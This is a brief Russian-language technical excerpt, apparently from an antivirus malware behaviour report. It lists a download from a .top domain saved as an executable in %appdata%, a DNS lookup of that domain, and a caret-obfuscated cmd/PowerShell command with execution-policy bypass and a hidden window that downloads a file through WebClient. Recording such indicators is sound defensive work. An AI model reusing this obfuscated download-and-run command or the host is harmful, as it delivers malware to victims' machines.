Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^w^eR^Shell.exe -^EXe^C^U^tioN^Po^LIC^y B^Y^P^a^SS ^-^N^o^PR^o^FI^lE^ -wI^Nd^oWS^TYl^e^ ^Hi^d^DeN ^(^n^E^w-^ObJ^e^ct ^SYSTE^M.NEt.weBCl^IEnT)^.dOW^N^LOA^DFiL^e^(^'...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "P^O^w^eR^Shell.exe -^EXe^C^U^tioN^Po^LIC^y B^Y^P^a^SS ^-^N^o^PR^o^FI^lE^ -wI^Nd^oWS^TYl^e^ ^Hi^d^DeN ^(^n^E^w-^ObJ^e^ct ^SYSTE^M.NEt.weBCl^IEnT)^.dOW^N^LOA^DFiL^e^(^'...' (со скрытым окном)